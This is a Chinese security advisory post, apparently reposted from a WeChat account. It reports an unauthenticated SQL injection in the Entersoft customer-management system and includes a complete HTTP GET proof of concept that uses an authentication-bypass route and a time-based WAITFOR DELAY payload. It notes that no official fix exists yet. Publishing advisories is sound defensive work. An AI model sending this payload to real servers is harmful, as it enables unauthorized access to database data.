漏洞预警 | 浙大恩特客户资源管理系统T0140_editAction SQL注入漏洞

admin

104385
文章

87
评论

2023年11月22日12:00:04评论59 views字数 722阅读2分24秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

浙大恩特客户资源管理系统是一款外贸管理软件，它提供了多种功能，包括客户档案管理、邮件管理、OA外贸办公管理系统、分管权限管理、联系跟进及提醒、业务检查管理、统计分析管理等。

漏洞预警 | 浙大恩特客户资源管理系统T0140_editAction SQL注入漏洞

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：浙大恩特客户资源管理系统存在SQL注入漏洞，未授权的攻击者可以通过特殊路由绕过身份校验限制，从而进行SQL注入，获取数据库敏感信息。

0x04 影响版本

浙大恩特客户资源管理系统

0x05 POC

GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1%27;WAITFOR+DELAY+%270:0:5%27%2d%2d HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方暂无发布漏洞修复版本，建议用户关注官网动态：

http://www.entersoft.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 浙大恩特客户资源管理系统T0140_editAction SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 浙大恩特客户资源管理系统T0140_editAction SQL注入漏洞

暂无

【漏洞复现】佳会视频会议attachment接口处存在任意文件读取漏洞

Apache-OFBiz-目录遍历漏洞利用【附Poc】

漏洞预警 | 金和OA C6 任意文件读取漏洞

漏洞预警 | 用友U8Cloud XXE漏洞

漏洞预警 | 福建科立讯通信指挥调度管理平台SQL注入漏洞

漏洞复现 | 大华ICC智能物联综合管理平台fastjson漏洞【附poc】

【0day】全智能停车视频收费系统WebServiceToAndroid存在任意文件上传漏洞

飞鱼星企业级智能上网行为管理系统 send_order.cgi 任意命令执行

亿赛通电子文档安全管理系统-File Read

(0day)WVP-GB28181摄像头管理平台存在敏感信息泄露

发表评论

在线咨询

微信